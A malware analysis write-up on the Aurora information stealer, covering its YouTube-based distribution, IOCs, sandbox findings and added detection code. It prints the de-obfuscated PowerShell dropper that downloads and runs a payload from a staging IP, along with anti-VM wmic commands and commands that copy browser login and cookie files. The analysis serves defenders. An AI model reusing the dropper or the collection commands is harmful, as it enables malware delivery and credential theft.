AC1DF0X VAULT

Aurora Stealer Analysis

Overview:
This research covers Aurora Stealer, an information stealer written in Go.

Dropper SHA256: a774163cffc40309ec4399c67a0c24a6c3194695c881429fb62c6019f8b7f66f
Aurora SHA256: 3dbde13894aa65f33217ab351dd3f5c4fb54d570b3371fef1505a7370aab4168

IOCs
http://185.246.221.126
https://cheat4.biz
212.87.204.92


Distribution:
Malicious actors have been known to hijack popular YouTube accounts with a large number of subscribers and use them to promote their nefarious activities. Aurora stealer operators will upload videos to the channel that contain links to malicious websites or downloads. In order to ensure maximum visibility, the operators use search engine optimization (SEO) tags to make the video appear higher in search engine results. The following image is from Morphisec.



Aurora is commonly distributed in the form of software cracks for popular applications, such as VPNs. In the campaign examined here, however, the main distribution method observed was game-cheat cracks advertised on YouTube, as described above.




Technical Analysis:
Aurora stealer primarily uses direct executable (.exe) downloads as its initial dropping method. It also employs other dropper formats, such as HTA (HTML Application) files. HTA files are commonly used to execute VBScript or JScript, which then downloads and executes the next-stage malware.

Upon examining the HTA dropper used in an Aurora campaign, it becomes evident that it has been deliberately obfuscated to evade antivirus and endpoint detection and response (AV/EDR) products as well as static analysis by researchers. This style of VBScript obfuscation is not new, however, and has been seen many times before.



Dynamic sandbox analysis lets the HTA dropper be analyzed far more efficiently than manual de-obfuscation. The dropper contains an obfuscated PowerShell command that contacts a staging server to download the next stage of the malware.



After de-obfuscating the PowerShell, the dropper logic looks roughly like this:
function Download-File($url, $path){
    [System.IO.File]::WriteAllBytes($path, (Invoke-WebRequest -Uri $url).Content)
}

function Execute-File($path){
    if ($path.EndsWith(".exe")) {
        Start-Process $path
    } else {
        Start-Process "powershell.exe" "-ExecutionPolicy Bypass -File `"$path`""
    }
}

function Get-DecodedString($encodedString){
    $decodedString = ""
    $encodingOffset = 53201
    foreach($char in $encodedString){
        $decodedString += [char]($char - $encodingOffset)
    }
    return $decodedString
}

function Main(){
    $downloadUrl = Get-DecodedString @(53305,53317,53317,53313,53259,53248,53248,53250,53257,53254,53247,53251,53253,53255,53247,53251,53251,53250,53247,53250,53251,53255,53248,53299,53306,53311,53316,53248,53251,53249,53251,53252,53247,53302,53321,53302,53247,53302,53321,53302)
    $downloadPath = "$($env:AppData)\2023.exe"
    if (Test-Path -Path $downloadPath){
        Execute-File $downloadPath
    } else {
        Download-File $downloadUrl $downloadPath
        Execute-File $downloadPath
    }
}
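As an added illustration (not code from the post), the same decoding routine re-implemented in Python, so an analyst can recover the embedded URL offline without executing the dropper. The integer array and the offset 53201 are the ones in the script above; the recover_offset helper is my own addition that infers the offset when it is not known, on the assumption that the plaintext starts with "http".

```python
# Added example (not from the original post): Python equivalent of the
# dropper's Get-DecodedString, plus an offset-recovery helper for cases where
# the constant has been changed between samples.

ENCODING_OFFSET = 53201  # the $encodingOffset constant from the dropper

# Encoded download URL exactly as it appears in the dropper's Main().
ENCODED_URL = [
    53305, 53317, 53317, 53313, 53259, 53248, 53248, 53250, 53257, 53254,
    53247, 53251, 53253, 53255, 53247, 53251, 53251, 53250, 53247, 53250,
    53251, 53255, 53248, 53299, 53306, 53311, 53316, 53248, 53251, 53249,
    53251, 53252, 53247, 53302, 53321, 53302, 53247, 53302, 53321, 53302,
]


def decode_offset_string(encoded, offset):
    """Subtract a constant from every code point, mirroring Get-DecodedString."""
    return "".join(chr(c - offset) for c in encoded)


def recover_offset(encoded, known_prefix="http"):
    """Assumed helper: infer the offset from a known plaintext prefix.

    Returns the offset that maps the first len(known_prefix) values onto the
    prefix, or None if no single offset fits all of them.
    """
    if len(encoded) < len(known_prefix):
        return None
    candidate = encoded[0] - ord(known_prefix[0])
    for value, expected in zip(encoded, known_prefix):
        if value - candidate != ord(expected):
            return None
    return candidate


def decode_with_inferred_offset(encoded, known_prefix="http"):
    """Decode without knowing the constant, using the prefix heuristic."""
    offset = recover_offset(encoded, known_prefix)
    if offset is None:
        raise ValueError("known prefix does not fit; offset cannot be inferred")
    return decode_offset_string(encoded, offset)


if __name__ == "__main__":
    print("decoded URL :", decode_offset_string(ENCODED_URL, ENCODING_OFFSET))
    print("inferred off:", recover_offset(ENCODED_URL))
```

Running it resolves the array to a URL on the 185.246.221.126 staging server already listed under IOCs; the inferred offset matches the constant in the script, which is a useful sanity check when a new sample only differs in the constant.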


Detect It Easy (DIE) confirms that the downloaded file is a Windows binary compiled from Go. Its entropy is around 6, which indicates that the binary is not packed (packed or encrypted payloads push entropy close to the maximum of 8 bits per byte).
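A quick triage check along the lines of what DIE reports, written here as an added Python example (not part of the post or of DIE): whole-file and windowed Shannon entropy with a packing threshold, plus a search for the "Go build ID:" and "Go buildinf:" marker strings that Go-compiled binaries carry. The 7.2 threshold and the two sample buffers are constructed for the example.

```python
import math
import os

# Added example, not code from the post or from Detect It Easy. Implements the
# two quick checks the text relies on: file entropy (packed/encrypted payloads
# approach 8 bits per byte) and marker strings found in Go-compiled PE files.

PACKED_THRESHOLD = 7.2  # assumed cut-off for "probably packed"; DIE uses its own scale
GO_MARKERS = (b"Go build ID:", b"Go buildinf:", b"runtime.main")


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 (constant) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def windowed_entropy(data: bytes, window: int = 4096) -> list:
    """Entropy per fixed-size window. A single high window inside an otherwise
    normal file points at an embedded encrypted blob rather than a packed file."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def looks_packed(data: bytes, threshold: float = PACKED_THRESHOLD) -> bool:
    """Heuristic: whole-file entropy at or above the threshold."""
    return shannon_entropy(data) >= threshold


def go_markers_present(data: bytes) -> list:
    """Return the Go marker strings found (heuristic; stripped builds may lack some)."""
    return [m.decode() for m in GO_MARKERS if m in data]


def triage(data: bytes) -> dict:
    """Summarise the checks for one file's bytes."""
    return {
        "entropy": round(shannon_entropy(data), 2),
        "max_window_entropy": round(max(windowed_entropy(data)), 2) if data else 0.0,
        "packed": looks_packed(data),
        "go_markers": go_markers_present(data),
    }


# Constructed samples: a pseudo Go binary (padding plus the marker strings) and
# random bytes standing in for a packed payload. Neither is a real executable.
FAKE_GO_SAMPLE = (b"MZ" + b"\x00" * 510 + b"Go build ID: \"example\"\x00"
                  + b"\x90" * 2048 + b"\xff Go buildinf:" + b"\x00" * 256)
RANDOM_SAMPLE = os.urandom(65536)

if __name__ == "__main__":
    print("fake go sample:", triage(FAKE_GO_SAMPLE))
    print("random sample :", triage(RANDOM_SAMPLE))
```

On a real sample, read the file with open(path, "rb").read() and pass the bytes to triage(); an entropy near 6 with the Go markers present is the profile the text describes, whereas a value above the threshold with no markers would suggest a packer wrapping the Go payload.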



Upon examining the binary in IDA, it is observed that there are references and calls to the Windows Management Instrumentation Command-line (wmic) utility to gather specific system information. This is achieved by launching the Windows Command Prompt (cmd.exe) in the background and executing wmic commands.



The malware uses this hardware inventory as an anti-analysis check, most notably the GPU, which it queries with the wmic command "path win32_VideoController get name". Virtual machines and sandboxes generally report a hypervisor-specific or generic display adapter rather than a real GPU, so the returned name lets the malware judge whether it is running in a virtual environment or under a researcher's analysis tooling and stop before doing anything detectable. Below is the full list of discovery commands executed.

wmic csproduct get uuid
wmic os get Caption
wmic path win32_VideoController get name
wmic cpu get name
systeminfo

Aurora, being a stealer, is expected to target common data locations such as browser profiles. It does exactly that: it copies browser profile files (history, cookies, saved logins and the Local State file) into randomly named folders under %TEMP%. The files are then base64 encoded and sent to the command and control (C2) server. This style of exfiltration is typical of stealers, since these files hold login credentials and other personal data. Below are example commands that Aurora runs.

powershell "" "copy \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\XVlBzgbaiC\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\Admin\AppData\Local\Temp\MRAjWwhTHc\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\SjFbcXoEFf\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\lgTeMaPEZQ\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\leQYhYzRyWJjPjz\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\pfRFEgmota\""

powershell "" "copy \"C:\Users\Admin\AppData\Local\Microsoft\Windows\History\" \"C:\Users\Admin\AppData\Local\Temp\TCoaNatyyi\""
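The discovery and collection stages above can be turned into detection logic on process-creation telemetry. The following is an added Python example (not from the post) that runs two rules over constructed log lines in a simple time|pid|ppid|image|cmdline format: one flags a parent process that spawns three or more of the wmic/systeminfo discovery commands listed earlier (noting whether the win32_VideoController anti-VM query is among them), the other flags a copy of a browser profile file into a randomly named folder under %TEMP%. The log format, PIDs, timestamps and the two benign events are assumptions of the example; the malicious command lines are the ones shown in this post.

```python
import re
from collections import defaultdict

# Constructed process-creation events in the form time|pid|ppid|image|cmdline.
# The wmic and copy command lines are the ones observed in the post; PIDs,
# timestamps and the two benign events at the end are invented for the example.
SAMPLE_LOG = r"""
2023-02-10T12:00:01|4120|3988|C:\Windows\System32\cmd.exe|cmd /c wmic csproduct get uuid
2023-02-10T12:00:01|4124|3988|C:\Windows\System32\cmd.exe|cmd /c wmic os get Caption
2023-02-10T12:00:02|4130|3988|C:\Windows\System32\cmd.exe|cmd /c wmic path win32_VideoController get name
2023-02-10T12:00:02|4136|3988|C:\Windows\System32\cmd.exe|cmd /c wmic cpu get name
2023-02-10T12:00:03|4140|3988|C:\Windows\System32\cmd.exe|cmd /c systeminfo
2023-02-10T12:00:05|4150|3988|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\SjFbcXoEFf\""
2023-02-10T12:00:05|4152|3988|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\leQYhYzRyWJjPjz\""
2023-02-10T12:00:06|4154|3988|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell "" "copy \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\XVlBzgbaiC\""
2023-02-10T12:01:00|5000|1300|C:\Windows\System32\cmd.exe|cmd /c wmic os get Caption
2023-02-10T12:02:00|5100|1300|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "copy \"C:\Users\Admin\Documents\report.docx\" \"C:\Users\Admin\AppData\Local\Temp\report.docx\""
"""

# Discovery commands listed in the post, normalised to lower case.
AURORA_DISCOVERY = {
    "wmic csproduct get uuid",
    "wmic os get caption",
    "wmic path win32_videocontroller get name",
    "wmic cpu get name",
    "systeminfo",
}
ANTI_VM_QUERY = "wmic path win32_videocontroller get name"

# Basenames of the browser profile files the post shows being copied.
BROWSER_ARTIFACTS = {"login data", "cookies", "web data", "local state", "history"}

# copy \"<src>\" \"<dst>\" as it appears inside the PowerShell command line.
COPY_RE = re.compile(r'copy\s+\\"(?P<src>[^"]+?)\\"\s+\\"(?P<dst>[^"]+?)\\"', re.IGNORECASE)
# Randomly named (alphanumeric) folder directly under %LOCALAPPDATA%\Temp.
TEMP_DST_RE = re.compile(r"\\AppData\\Local\\Temp\\[A-Za-z0-9]{8,20}$", re.IGNORECASE)


def parse_events(text):
    """Parse the constructed pipe-delimited log into event dicts."""
    events = []
    for line in text.strip().splitlines():
        parts = line.split("|", 4)
        if len(parts) != 5:
            continue  # skip malformed lines rather than crash the detection
        ts, pid, ppid, image, cmdline = parts
        events.append({"time": ts, "pid": int(pid), "ppid": int(ppid),
                       "image": image, "cmdline": cmdline})
    return events


def normalize_discovery(cmdline):
    """Reduce a command line to its wmic/systeminfo part, or None if neither."""
    low = " ".join(cmdline.lower().split())
    idx = low.find("wmic ")
    if idx != -1:
        return low[idx:]
    if re.search(r"(^|\s)systeminfo(\s|$)", low):
        return "systeminfo"
    return None


def detect_discovery(events, min_hits=3):
    """Rule 1: one parent spawning several of the Aurora discovery commands."""
    by_parent = defaultdict(set)
    for e in events:
        key = normalize_discovery(e["cmdline"])
        if key in AURORA_DISCOVERY:
            by_parent[e["ppid"]].add(key)
    alerts = []
    for ppid, keys in by_parent.items():
        if len(keys) >= min_hits:
            alerts.append({"rule": "aurora_discovery_cluster", "ppid": ppid,
                           "commands": sorted(keys),
                           "anti_vm_check": ANTI_VM_QUERY in keys})
    return alerts


def detect_browser_collection(events):
    """Rule 2: browser profile file copied into a random-named %TEMP% folder."""
    alerts = []
    for e in events:
        m = COPY_RE.search(e["cmdline"])
        if not m:
            continue
        src, dst = m.group("src"), m.group("dst")
        artifact = src.rstrip("\\").rsplit("\\", 1)[-1].lower()
        if artifact in BROWSER_ARTIFACTS and TEMP_DST_RE.search(dst):
            alerts.append({"rule": "browser_artifact_staged_to_temp", "pid": e["pid"],
                           "ppid": e["ppid"], "artifact": artifact, "destination": dst})
    return alerts


def run_detections(text):
    events = parse_events(text)
    return detect_discovery(events) + detect_browser_collection(events)


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_LOG):
        print(alert)
```

Both rules key on the parent process so that a lone "wmic os get Caption" typed by an administrator (the benign event with ppid 1300) does not fire, while the cluster of five discovery commands and the three browser-file copies from the same parent do. In a real deployment the parse_events step would be replaced by the SIEM's process-creation schema (for example Sysmon event ID 1), with the rest unchanged.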